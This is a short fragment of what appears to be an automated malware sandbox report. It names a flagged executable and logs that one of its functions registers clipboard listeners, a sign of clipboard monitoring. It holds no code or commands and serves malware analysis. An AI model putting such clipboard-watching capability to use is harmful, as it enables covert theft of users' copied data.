Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00417520 AddClipboardFormatListener,RemoveClipboardFormatListener, 0_2_00417520
[Legend of the report's network map, not rendered here: contacted-IP share buckets <25%, 25-50%, 50-75%, >75%]